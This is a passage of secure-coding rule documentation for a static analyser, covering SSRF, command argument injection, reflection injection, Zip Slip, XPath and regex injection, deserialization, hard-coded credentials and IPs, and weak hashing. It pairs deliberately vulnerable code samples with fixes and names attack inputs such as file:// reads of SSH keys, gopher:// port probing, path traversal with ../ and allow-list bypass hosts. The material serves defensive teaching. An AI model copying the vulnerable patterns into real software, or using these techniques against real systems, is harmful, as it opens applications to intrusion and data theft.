When the application allows it, converting user-submitted data to a harmless type can help prevent JSON injection vulnerabilities. In particular, converting user inputs to numeric types is an efficient sanitation mechanism.

This mechanism can be extended to other types, including more complex ones. However, care should be taken when dealing with them, as manually validating or sanitizing complex types can represent a challenge.

Note that choosing this solution can be error-prone: every user input has to be validated or sanitized without oversight.
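A sketch of the numeric-conversion approach (the method and its use are illustrative, not part of the rule's own examples):

```java
public class NumericSanitizer {
    // Parsing the input to a long guarantees the resulting value cannot carry
    // quotes, braces, or any other character able to alter JSON structure.
    public static long toSafeId(String userInput) {
        return Long.parseLong(userInput.trim()); // throws NumberFormatException on tampering
    }
}
```

A tampered value such as 1","admin":true fails the parse and never reaches the JSON string.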

Resources

Documentation

Standards

javasecurity:S5144

Why is this an issue?

Server-Side Request Forgery (SSRF) occurs when attackers can coerce a server to perform arbitrary requests on their behalf.

An SSRF vulnerability can either be basic or blind, depending on whether the server’s fetched data is directly returned in the web application’s response.
The absence of the corresponding response for the coerced request on the application is not a barrier to exploitation and thus must be treated in the same way as basic SSRF.

What is the potential impact?

SSRF usually results in unauthorized actions or data disclosure in the vulnerable application or on a different system it can reach. Conditional to what is reachable, remote command execution can be achieved, although it often requires chaining with further exploitations.

Information disclosure is SSRF’s core outcome. Depending on the extracted data, an attacker can perform a variety of different actions that can range from low to critical severity.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Local file read to host takeover

An attacker manipulates an application into performing a local request for a sensitive file, such as ~/.ssh/id_rsa, by using the File URI scheme file://.
Once in possession of the SSH keys, the attacker establishes a remote connection to the system hosting the web application.

Internal Network Reconnaissance

An attacker enumerates internal accessible ports from the affected server or others to which the server can communicate by iterating over the port field in the URL http://127.0.0.1:{port}.
Taking advantage of other supported URL schemas (dependent on the affected system), for example, gopher://127.0.0.1:3306, an attacker would be able to connect to a database service and perform queries on it.

How to fix it in Java SE

Code examples

The following code is vulnerable to SSRF as it performs an HTTP request to a URL defined by untrusted data.

Noncompliant code example

protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
    String location = req.getParameter("url");

    URL url = new URL(location);

    HttpURLConnection  conn = (HttpURLConnection) url.openConnection();
}

Compliant solution

protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
    String location = req.getParameter("url");

    List<String> allowedHosts = new ArrayList<String>();
    allowedHosts.add("https://trusted1.example.com/");
    allowedHosts.add("https://trusted2.example.com/");

    URL url = new URL(location);

    if (allowedHosts.contains(location)) {
        HttpURLConnection conn = (HttpURLConnection) url.openConnection();
    }
}

How does this work?

The application should avoid opening URLs that are constructed with untrusted data.

When such a feature is strictly necessary, SSRF can be mitigated by applying an allow-list of trustable schemes and domains.

The compliant code example uses such an approach.

Pitfalls

The trap of 'StartsWith' and equivalents

When validating untrusted URLs by checking if they start with a trusted scheme and authority pair scheme://authority, ensure that the validation string contains a path separator / as the last character.

If the validation string does not contain a terminating path separator, the SSRF vulnerability remains; only the exploitation technique changes.

Thus, a validation like startsWith("https://example.com") or an equivalent with the regex ^https://example\.com.* can be exploited with the following URL https://example.commit.malicious.io.
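The difference can be sketched as follows (the trusted host is illustrative):

```java
public class UrlAllowList {
    // The trailing '/' is essential: without it, the check below would also
    // accept "https://example.commit.malicious.io".
    public static boolean isTrusted(String url) {
        return url != null && url.startsWith("https://example.com/");
    }
}
```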

Resources

Standards

javasecurity:S6350

Constructing arguments of system commands from user input is security-sensitive. It has led to vulnerabilities in the past.

Arguments of system commands are processed by the executed program. The arguments are usually used to configure and influence the behavior of the programs. Control over a single argument might be enough for an attacker to trigger dangerous features like executing arbitrary commands or writing files into specific directories.

Ask Yourself Whether

  • Malicious arguments can result in undesired behavior in the executed command.
  • Passing user input to a system command is not necessary.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Avoid constructing system commands from user input when possible.
  • Ensure that no risky arguments can be injected for the given program, e.g., type-cast the argument to an integer.
  • Use a more secure interface to communicate with other programs, e.g., the standard input stream (stdin).

Sensitive Code Example

Arguments like -delete or -exec for the find command can alter the expected behavior and result in vulnerabilities:

String input = request.getParameter("input");
String cmd[] =  new String[] { "/usr/bin/find", input };
Runtime.getRuntime().exec(cmd); // Sensitive

Compliant Solution

Use an allow-list to restrict the arguments to trusted values:

List<String> allowed = Arrays.asList("/tmp/logs", "/var/log"); // trusted values
String input = request.getParameter("input");
if (allowed.contains(input)) {
  String cmd[] =  new String[] { "/usr/bin/find", input };
  Runtime.getRuntime().exec(cmd);
}

See

javasecurity:S6173

Why is this an issue?

Reflection injections occur in a web application when it retrieves data from a user or a third-party service and fully or partially uses it to inspect, load or invoke a component by name.

If an application uses a reflection method in a way that is vulnerable to injections, it is exposed to attacks that aim to achieve remote code execution on the server hosting the website.

An attacker exploits this by carefully crafting a string referencing components such as class or method names, which lets them change the initial reflection logic into an impactful malicious one.

After creating the malicious request and triggering it, the attacker can attack the servers affected by this vulnerability without relying on any prerequisites.

What is the potential impact?

If user-supplied values are used to choose which code is executed, an attacker may be able to supply carefully-chosen values that cause unexpected code to run. The attacker can use this ability to run arbitrary code on the server.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Application-specific attacks

In this scenario, the attackers succeed in injecting a seemingly-legitimate object, but whose properties might be used maliciously.

Depending on the application, attackers might be able to modify important data structures or content to escalate privileges or perform unwanted actions. For example, with an e-commerce application, this could be changing the number of products or prices.

Full application compromise

In the worst-case scenario, the attackers succeed in injecting an object triggering code execution.

Depending on the attacker, code execution can be used with different intentions:

  • Download the internal server’s data, most likely to sell it.
  • Modify data, install malware, for instance, malware that mines cryptocurrencies.
  • Stop services or exhaust resources, for instance, with fork bombs.

This threat is particularly insidious if the attacked organization does not maintain a Disaster Recovery Plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker additionally manages to elevate their privileges as an administrator and attack other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised through a combination of unsafe deserialization and misconfiguration:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Java SE

Code examples

In the following example, the code simulates a feature in an image editing application that allows users to install plugins to add new filters or effects. It assumes the user will give a known name, such as "SepiaEffect".

Noncompliant code example

import java.lang.Class;
import java.lang.reflect.Constructor;
import java.lang.reflect.Method;

@RestController
public class EffectController
{
    @GetMapping(value = "/filter/apply")
    @ResponseBody
    public ResponseEntity<String> apply(@RequestParam("effect") String effectName)
    {
        boolean result = false;

        try
        {
            Class<?> effectClass             = Class.forName(effectName);  // Noncompliant
            Constructor<?> effectConstructor = effectClass.getConstructor();
            Object effectObject              = effectConstructor.newInstance();
            Method applyMethod               = effectClass.getMethod("applyFilter");

            result = (boolean) applyMethod.invoke(effectObject);

        } catch (Exception e) {}

        if (result)
        {
            return new ResponseEntity<>("Filter Applied", HttpStatus.OK);
        }
        else
        {
            return new ResponseEntity<>("Filter Failure", HttpStatus.FORBIDDEN);
        }
    }
}

Compliant solution

import java.lang.Class;
import java.lang.reflect.Constructor;
import java.lang.reflect.Method;
import java.util.HashSet;
import java.util.Set;

@RestController
public class EffectController
{
    private static final Set<String> EFFECT_ALLOW_LIST = new HashSet<>();

    static
    {
        EFFECT_ALLOW_LIST.add("SepiaEffect");
        EFFECT_ALLOW_LIST.add("BlackAndWhiteEffect");
        EFFECT_ALLOW_LIST.add("WaterColorEffect");
        EFFECT_ALLOW_LIST.add("OilPaintingEffect");
    }

    @GetMapping(value = "/filter/apply")
    @ResponseBody
    public ResponseEntity<String> apply(@RequestParam("effect") String effectName)
    {
        if (!EFFECT_ALLOW_LIST.contains(effectName)) {
            return new ResponseEntity<>("Filter Failure", HttpStatus.FORBIDDEN);
        }

        boolean result = false;

        try
        {
            Class<?> effectClass             = Class.forName(effectName);
            Constructor<?> effectConstructor = effectClass.getConstructor();
            Object effectObject              = effectConstructor.newInstance();
            Method applyMethod               = effectClass.getMethod("applyFilter");

            result = (boolean) applyMethod.invoke(effectObject);

        } catch (Exception e) {}

        if (result) {
            return new ResponseEntity<>("Filter Applied", HttpStatus.OK);
        }
        else {
            return new ResponseEntity<>("Filter Failure", HttpStatus.FORBIDDEN);
        }
    }
}

How does this work?

Pre-approved classes

The cleanest way to avoid this defect is to validate the input before using it in a reflection method.

Create a list of authorized and secure classes that you want the application to be able to execute.
If a user input does not match an entry in this list, it should be rejected because it is considered unsafe.

Important note: The application must perform this validation on the server side, not in client-side front-ends.

Resources

Articles & blog posts

Standards

javasecurity:S6096

Why is this an issue?

Zip slip is a special case of path injection. It occurs when an application uses the name of an archive entry to construct a file path and access this file without validating its path first.

This rule will consider all archives untrusted, assuming they have been created outside the application file system.

A user with malicious intent would inject specially crafted values, such as ../, in the archive entry name to change the initial intended path. The resulting path would resolve somewhere in the filesystem where the user should not normally have access.

What is the potential impact?

A web application is vulnerable to Zip Slip when an attacker is able to exploit it by submitting an archive they control.

The files that can be affected are limited by the permission of the process that runs the application. Worst case scenario: the process runs with root privileges on Linux, and therefore any file can be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Override arbitrary files

The application opens the archive to copy its entries to the file system. The entries' names contain path traversal payloads for existing files in the system, which are overwritten once the entries are copied. The vulnerability is exploited to corrupt files critical for the application or operating system to work properly.

It could result in data being lost or the application being unavailable.

How to fix it in Java SE

Code examples

The following code is vulnerable to Zip Slip as it is constructing a path using an archive entry name. This path is then used to copy a file without being validated first. Therefore, it can be leveraged by an attacker to overwrite arbitrary files.

Noncompliant code example

public class Example {

    static private String targetDirectory = "/example/directory/";

    public void ExtractEntry(ZipFile zipFile) throws IOException {

        Enumeration<? extends ZipEntry> entries = zipFile.entries();
        ZipEntry entry = entries.nextElement();
        InputStream inputStream = zipFile.getInputStream(entry);

        File file = new File(targetDirectory + entry.getName());

        Files.copy(inputStream, file.toPath(), StandardCopyOption.REPLACE_EXISTING);
    }
}

Compliant solution

public class Example {

    static private String targetDirectory = "/example/directory/";

    public void ExtractEntry(ZipFile zipFile) throws IOException {

        Enumeration<? extends ZipEntry> entries = zipFile.entries();
        ZipEntry entry = entries.nextElement();
        InputStream inputStream = zipFile.getInputStream(entry);

        File file = new File(targetDirectory + entry.getName());

        String canonicalDestinationPath = file.getCanonicalPath();

        if (canonicalDestinationPath.startsWith(targetDirectory)) {
            Files.copy(inputStream, file.toPath(), StandardCopyOption.REPLACE_EXISTING, LinkOption.NOFOLLOW_LINKS);
        }
    }
}

How does this work?

The universal way to prevent Zip Slip is to validate the paths constructed from untrusted archive entry names.

The validation should be done as follows:

  1. Resolve the canonical path of the file by using methods like java.io.File.getCanonicalFile or java.io.File.getCanonicalPath. This resolves relative paths and path components like ../ and removes any ambiguity regarding the file’s location.
  2. Check that the canonical path is within the directory where the file should be located.
  3. Ensure the target directory path ends with a forward slash to prevent partial path traversal, for example, /base/dirmalicious starts with /base/dir but does not start with /base/dir/.
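The three steps above can be sketched as a small Java helper (illustrative; the base directory and entry names are hypothetical):

```java
import java.io.File;
import java.io.IOException;

public class ZipPathValidator {

    // Returns true only if entryName still resolves inside baseDir after canonicalization.
    static boolean isSafeDestination(String baseDir, String entryName) throws IOException {
        // Step 3: make sure the base directory ends with a separator so that
        // "/base/dirmalicious" does not pass a startsWith("/base/dir") check.
        String canonicalBase = new File(baseDir).getCanonicalPath();
        if (!canonicalBase.endsWith(File.separator)) {
            canonicalBase += File.separator;
        }
        // Steps 1 and 2: canonicalize the candidate path (resolving "..")
        // and check that it is still under the base directory.
        String canonicalTarget = new File(baseDir, entryName).getCanonicalPath();
        return canonicalTarget.startsWith(canonicalBase);
    }

    public static void main(String[] args) throws IOException {
        System.out.println(isSafeDestination("/tmp/extract", "images/logo.png")); // true
        System.out.println(isSafeDestination("/tmp/extract", "../../etc/passwd")); // false
    }
}
```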

Pitfalls

Partial Path Traversal

When validating untrusted paths by checking if they start with a trusted folder name, ensure the validation strings all contain a path separator as the last character.
A partial path traversal vulnerability can be unintentionally introduced into the application without a path separator as the last character of the validation strings.

For example, the following code is vulnerable to partial path injection. Note that the string targetDirectory does not end with a path separator:

static private String targetDirectory = "/Users/John";

public void ExtractEntry(ZipFile zipFile) throws IOException {

    Enumeration<? extends ZipEntry> entries = zipFile.entries();
    ZipEntry entry = entries.nextElement();
    InputStream inputStream = zipFile.getInputStream(entry);

    File file = new File(targetDirectory, entry.getName());

    String canonicalDestinationPath = file.getCanonicalPath();

    if (canonicalDestinationPath.startsWith(targetDirectory)) {
        Files.copy(inputStream, file.toPath(), StandardCopyOption.REPLACE_EXISTING, LinkOption.NOFOLLOW_LINKS);
    }
}

This check can be bypassed because "/Users/Johnny".startsWith("/Users/John") returns true. Thus, for validation, "/Users/John" should actually be "/Users/John/".

Warning: Some functions, such as .getCanonicalPath, remove the terminating path separator in their return value.
The validation code should be tested to ensure that it cannot be impacted by this issue.

Here is a real-life example of this vulnerability.

Resources

Documentation

  • snyk - Zip Slip Vulnerability

Standards

javasecurity:S2091

Why is this an issue?

XPath injections occur in an application when the application retrieves untrusted data and inserts it into an XML Path (XPath) query without sanitizing it first.

What is the potential impact?

In the context of a web application vulnerable to XPath injection:
After discovering the injection point, attackers insert data into the vulnerable field to execute malicious commands in the affected XML documents.

The impact of this vulnerability depends on how important XML structures are to the enterprise.
In organizations that rely on XML structures for business-critical operations an attack can be critical, while in those where XML only transports innocuous data it can be harmless.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Data Leaks

A malicious XPath query allows direct data leakage from one or more databases. Although XML is not as widely used as it once was, this possibility still exists with configuration files, for example.

Data deletion and denial of service

The malicious query allows the attacker to delete data in the affected XML documents.
This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP) and if XML structures are considered important, as missing critical data can disrupt the regular operations of an organization.

How to fix it in Java SE

Code examples

The following noncompliant code is vulnerable to XPath injections because untrusted data is concatenated to an XPath query without prior validation.

Noncompliant code example

public boolean authenticate(HttpServletRequest req, XPath xpath, Document doc) throws XPathExpressionException {
  String user = req.getParameter("user");
  String pass = req.getParameter("pass");

  String expression = "/users/user[@name='" + user + "' and @pass='" + pass + "']";

  return (boolean)xpath.evaluate(expression, doc, XPathConstants.BOOLEAN);
}

Compliant solution

public boolean authenticate(HttpServletRequest req, XPath xpath, Document doc) throws XPathExpressionException {
  String user = req.getParameter("user");
  String pass = req.getParameter("pass");

  String expression = "/users/user[@name=$user and @pass=$pass]";

  xpath.setXPathVariableResolver(v -> {
    switch (v.getLocalPart()) {
      case "user":
        return user;
      case "pass":
        return pass;
      default:
        throw new IllegalArgumentException();
    }
  });

  return (boolean)xpath.evaluate(expression, doc, XPathConstants.BOOLEAN);
}

How does this work?

As a rule of thumb, the best approach to protect against injections is to systematically ensure that untrusted data cannot break out of the initially intended logic.

Parameterized Queries

For XPath injections, the cleanest way to do so is to use parameterized queries.

XPath allows for the usage of variables inside expressions in the form of $variable. XPath variables can be used to construct an XPath query without needing to concatenate user arguments to the query at runtime. Here is an example of an XPath query with variables:

/users/user[@name=$user and @pass=$pass]

When the XPath query is executed, the user input is passed alongside it. During execution, when the values of the variables need to be known, a resolver will return the correct user input for each variable. The contents of the variables are not considered application logic by the XPath executor, and thus injection is not possible.

In the example, a parameterized XPath query is created, and an XPathVariableResolver is used to securely insert untrusted data into the query, similar to parameterized SQL queries.

Validation

In case XPath parameterized queries are not available, the most secure way to protect against injections is to validate the input before using it in an XPath query.

Important: The application must do this validation server-side. Validating this client-side is insecure.

Input can be validated in multiple ways:

  • By checking against a list of authorized and secure strings that the application is allowed to use in a query.
  • By ensuring user input is restricted to a specific range of characters (e.g., the regex /^[a-zA-Z0-9]*$/ only allows alphanumeric characters.)
  • By ensuring user input does not include any XPath metacharacters, such as ", ', /, @, =, *, [, ], ( and ).

If user input is not considered valid, it should be rejected as it is unsafe.
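As a sketch, the allowlist and character-range checks described above could look like this in Java (the allowed values are hypothetical):

```java
import java.util.Set;
import java.util.regex.Pattern;

public class XPathInputValidator {

    // Allowlist of values the application expects (hypothetical entries).
    private static final Set<String> ALLOWED = Set.of("alice", "bob", "carol");

    // Restrict input to alphanumeric characters only, excluding all XPath metacharacters.
    private static final Pattern SAFE = Pattern.compile("^[a-zA-Z0-9]*$");

    static boolean isValid(String input) {
        // Either check works on its own; combining them is defense in depth.
        return ALLOWED.contains(input) && SAFE.matcher(input).matches();
    }

    public static void main(String[] args) {
        System.out.println(isValid("alice"));       // true
        System.out.println(isValid("' or '1'='1")); // false: XPath metacharacters
    }
}
```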

For Java, OWASP’s Enterprise Security API offers encodeForXPath which sanitizes metacharacters automatically.

Resources

Articles & blog posts

Standards

ruby:S1313

Hardcoding IP addresses is security-sensitive. It has led in the past to the following vulnerabilities:

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time this happens, instead of having an operation team change a configuration file.
  • It misleads teams into using the same address in every environment (dev, sys, qa, prod).

Last but not least, it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks are always possible, but with a hardcoded IP address resolving the issue takes more time, which increases an attack’s impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • Can give information to an attacker about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code; instead, make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentiality is not required, a domain name can be used, since it makes it possible to change the destination quickly without rebuilding the software.

Sensitive Code Example

ip = "192.168.12.42"; // Sensitive

Compliant Solution

ip = IP_ADDRESS; // Compliant

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID)
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the range 2001:db8::/32, reserved for documentation purposes by RFC 3849

See

ruby:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to the following vulnerabilities:

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.

It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", …​

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

See

tsql:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to the following vulnerabilities:

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.

It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", …​

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

See

tsql:S2070

This rule is deprecated; use S4790 instead.

Why is this an issue?

The MD5 algorithm and its successor, SHA-1, are no longer considered secure, because it is too easy to create hash collisions with them. That is, it takes too little computational effort to come up with a different input that produces the same MD5 or SHA-1 hash, and using that second, same-hash value gives an attacker the same access as the originally hashed value. This applies as well to the other Message-Digest algorithms: MD2, MD4, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160.

Consider using safer alternatives, such as SHA-256, SHA-512 or SHA-3.

Noncompliant code example

SELECT HASHBYTES('SHA1', MyColumn) FROM dbo.MyTable;

Compliant solution

SELECT HASHBYTES('SHA2_256', MyColumn) FROM dbo.MyTable;

Resources

tsql:S1313

Hardcoding IP addresses is security-sensitive. It has led in the past to the following vulnerabilities:

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time this happens, instead of having an operation team change a configuration file.
  • It misleads teams into using the same address in every environment (dev, sys, qa, prod).

Last but not least, it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks are always possible, but with a hardcoded IP address resolving the issue takes more time, which increases an attack’s impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • Can give information to an attacker about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code; instead, make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentiality is not required, a domain name can be used, since it makes it possible to change the destination quickly without rebuilding the software.

Sensitive Code Example

SET @IP = '192.168.12.42'; -- Sensitive

Compliant Solution

SET @IP  = (SELECT ip_address FROM configuration);  -- Compliant

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID)
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737

See

tsql:S1523

Executing code dynamically is security sensitive. It has led in the past to the following vulnerabilities:

Some APIs enable the execution of dynamic code by providing it as strings at runtime. These APIs might be useful in some very specific meta-programming use cases. However, most of the time their use is frowned upon because they also increase the risk of injected code. Such attacks can run either on the server or in the client (for example, XSS attacks) and have a huge impact on an application’s security.

Both EXECUTE( ... ) and EXEC( ... ) execute as a command the string passed as an argument. They are safe only if the argument is composed of constant character string expressions. But if the command string is dynamically built using external parameters, then it is considered very dangerous because executing a random string allows the execution of arbitrary code.

This rule marks for review each occurrence of EXEC and EXECUTE. This rule does not detect code injections. It only highlights the use of APIs which should be used sparingly and very carefully. The goal is to guide security code reviews.

Ask Yourself Whether

  • the executed code may come from an untrusted source and hasn’t been sanitized.
  • you really need to run code dynamically.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

The best solution is to not run code provided by an untrusted source. If you really need to build a command string using external parameters, you should use EXEC sp_executesql instead.

Do not try to create a blacklist of dangerous code. It is impossible to cover all attacks that way.

Sensitive Code Example

CREATE PROCEDURE USER_BY_EMAIL(@email VARCHAR(255)) AS
BEGIN
  EXEC('USE AuthDB; SELECT id FROM user WHERE email = ''' + @email + ''' ;'); -- Sensitive: could inject code using @email
END

Compliant Solution

CREATE PROCEDURE USER_BY_EMAIL(@email VARCHAR(255)) AS
BEGIN
  EXEC sp_executesql N'USE AuthDB; SELECT id FROM user WHERE email = @user_email;',
                     N'@user_email VARCHAR(255)',
                      @user_email = @email;
END

See

tsql:S4790

Cryptographic hash algorithms such as MD2, MD4, MD5, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160 and SHA-1 are no longer considered secure, because it is possible to have collisions (little computational effort is enough to find two or more different inputs that produce the same hash).

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm e-mail when registering on a website, reset password, etc …​).
  • To compute some message integrity.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives, such as SHA-256, SHA-512, SHA-3 are recommended, and for password hashing, it’s even better to use algorithms that do not compute too "quickly", like bcrypt, scrypt, argon2 or pbkdf2 because it slows down brute force attacks.
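For application code that hashes passwords before they reach the database, the JDK ships a PBKDF2 implementation. A minimal Java sketch; the iteration count is illustrative and should be tuned to your hardware:

```java
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;
import java.security.SecureRandom;
import java.util.Base64;

public class PasswordHashing {

    // Derives a slow, salted hash from a password using PBKDF2 (JDK built-in).
    static String hashPassword(char[] password, byte[] salt) throws Exception {
        // 100_000 iterations is an illustrative work factor, not a recommendation.
        PBEKeySpec spec = new PBEKeySpec(password, salt, 100_000, 256);
        byte[] hash = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA256")
                                      .generateSecret(spec)
                                      .getEncoded();
        return Base64.getEncoder().encodeToString(hash);
    }

    public static void main(String[] args) throws Exception {
        byte[] salt = new byte[16];
        new SecureRandom().nextBytes(salt); // a fresh random salt per password
        System.out.println(hashPassword("s3cret".toCharArray(), salt));
    }
}
```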

Sensitive Code Example

SELECT HASHBYTES('SHA1', MyColumn) FROM dbo.MyTable;

Compliant Solution

SELECT HASHBYTES('SHA2_512', MyColumn) FROM dbo.MyTable;

See

roslyn.sonaranalyzer.security.cs:S2631

Why is this an issue?

Regular expression injections occur when the application retrieves untrusted data and uses it as a regex to pattern match a string with it.

Most regular expression engines use backtracking to try all possible regex execution paths when evaluating an input. In some cases this can lead to severe performance problems, referred to as catastrophic backtracking.

What is the potential impact?

In the context of a web application vulnerable to regex injection:
After discovering the injection point, attackers insert data into the vulnerable field to make the affected component inaccessible.

Depending on the application’s software architecture and the injection point’s location, the impact may or may not be visible.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Self Denial of Service

In cases where the complexity of the regular expression is exponential to the input size, a small, carefully-crafted input (for example, 20 chars) can trigger catastrophic backtracking and cause a denial of service of the application.

Super-linear regex complexity can produce the same effects for a large, carefully crafted input (thousands of chars).

If the component jeopardized by this vulnerability is not a bottleneck that acts as a single point of failure (SPOF) within the application, the denial of service might only affect the attacker who initiated it.

Such benign denial of service can also occur in architectures that rely heavily on containers and container orchestrators. Replication systems would detect the failure of a container and automatically replace it.

Infrastructure SPOFs

However, a denial of service attack can be critical to the enterprise if it targets a SPOF component. Sometimes the SPOF is a software architecture vulnerability (such as a single component on which multiple critical components depend) or an operational vulnerability (for example, insufficient container creation capabilities or failures from containers to terminate).

In either case, attackers aim to exploit the infrastructure weakness by sending as many malicious payloads as possible, using potentially huge offensive infrastructures.

These threats are particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

How to fix it in .NET

Code examples

The following noncompliant code is vulnerable to Regex Denial of Service because untrusted data is used as a regex to scan a string without prior sanitization or validation.

Noncompliant code example

public class ExampleController : Controller
{
    public IActionResult Validate(string regex, string input)
    {
        bool match = Regex.IsMatch(input, regex);

        return Json(match);
    }
}

Compliant solution

public class ExampleController : Controller
{
    public IActionResult Validate(string regex, string input)
    {
        bool match = Regex.IsMatch(input, Regex.Escape(regex));

        return Json(match);
    }
}

How does this work?

Sanitization and Validation

Escaping metacharacters with native functions is one defense against regex injection.
The escape function sanitizes the input so that the regular expression engine interprets these characters literally.

An allowlist approach can also be used by creating a list containing authorized and secure strings you want the application to use in a query.
If a user input does not match an entry in this list, it should be considered unsafe and rejected.

Important note: The application must sanitize and validate on the server side, not in client-side front-ends.

Where possible, use non-backtracking regex engines, for example, Google’s re2.

In the compliant solution example, Regex.Escape escapes metacharacters and escape sequences that could have broken the initially intended logic.
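The same idea applies outside .NET; for illustration, here is a Java sketch in which Pattern.quote plays the role of Regex.Escape, forcing the untrusted input to match literally:

```java
import java.util.regex.Pattern;

public class RegexEscapeDemo {

    // Treats untrusted input as a literal string rather than as a pattern.
    static boolean literalMatch(String untrusted, String input) {
        // Pattern.quote wraps the string in \Q...\E so metacharacters lose their meaning.
        return Pattern.compile(Pattern.quote(untrusted)).matcher(input).find();
    }

    public static void main(String[] args) {
        System.out.println(literalMatch("a.b", "a.b"));       // true: literal match
        System.out.println(literalMatch("a.b", "axb"));       // false: '.' is not a wildcard here
        System.out.println(literalMatch("(a+)+$", "(a+)+$")); // true, with no catastrophic backtracking
    }
}
```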

Resources

Articles & blog posts

Standards

roslyn.sonaranalyzer.security.cs:S5135

Why is this an issue?

Deserialization injections occur when applications deserialize wholly or partially untrusted data without verification.

What is the potential impact?

In the context of a web application performing unsafe deserialization:
After detecting the injection vector, attackers inject a carefully-crafted payload into the application.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Application-specific attacks

In this scenario, the attackers succeed in injecting an object of the expected class, but with malicious properties that affect the object’s behavior.

If the application relies on the properties of the deserialized object, attackers can modify the data structure or content to escalate privileges or perform unwanted actions.
In the context of an e-commerce application, this could be changing the number of products or prices.

Full application compromise

In the worst-case scenario, the attackers succeed in injecting an object of a completely different class than expected, triggering code execution.

Depending on the attacker, code execution can be used with different intentions:

  • Download the internal server’s data, most likely to sell it.
  • Modify data, install malware, for instance, malware that mines cryptocurrencies.
  • Stop services or exhaust resources, for instance, with fork bombs.

This threat is particularly insidious if the attacked organization does not maintain a Disaster Recovery Plan (DRP).

Root privilege escalation and pivot

